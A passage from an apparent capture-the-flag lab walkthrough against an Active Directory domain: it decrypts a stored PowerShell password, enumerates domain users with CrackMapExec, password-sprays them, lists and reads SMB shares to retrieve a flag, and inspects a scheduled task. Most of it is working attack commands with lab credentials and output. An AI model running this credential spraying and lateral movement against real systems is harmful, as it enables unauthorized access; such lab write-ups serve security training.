$PlainTextPassword = [System.Runtime.InteropServices.Marshal]::PtrToStringBSTR($Ptr)
[System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($Ptr)These commands converted the SecureString to a plain text string and then freed the allocated memory to maintain security. Finally, I displayed the decrypted password using:
echo $PlainTextPasswordThe output revealed the decrypted password: to7oxaith2Vie9. This successful decryption indicated that the files I found were indeed a key and an encrypted password, and I had managed to uncover the latter using PowerShell’s capabilities.
Preparing for password spray
cme ldap 10.9.10.10 -u 'george.wirth' -p 'v765#QLm^8' -d core.cyber.local --users >> users.txt
awk '/LDAP/{print $5}' users.txt > only_users.txt
Password Spray
cme ldap 10.9.10.10 -u only_users.txt -p 'to7oxaith2Vie9'
LDAP 10.9.10.10 389 CYDC [+] cyber.local\Robert.Ortiz:to7oxaith2Vie9
What can user robert.ortiz access
cme smb 10.9.10.14 -u robert.ortiz -p 'to7oxaith2Vie9' -d cyber.local --shares
smbclient.py 'cyber.local/robert.ortiz:to7oxaith2Vie9@10.9.10.14'
Type help for list of commands
# use devops
# ls
drw-rw-rw- 0 Sat Dec 16 19:24:21 2023 .
drw-rw-rw- 0 Sat Dec 16 19:24:21 2023 ..
-rw-rw-rw- 70 Mon Jun 8 00:51:39 2020 flag.txt
# cat flag.txt
Cyb3rN3t1C5{D3vOP$_S3cure_Cr3d$}
# Get the scheduled task
$task = Get-ScheduledTask -TaskName "OpenEmail"
# Get the action associated with the task
$action = $task.Actions | Select-Object -First 1
# Extract the executable path from the action
$executablePath = $action.Arguments.Split('"')[1]
# Output the executable path
Write-Output "Executable Path: $executablePath"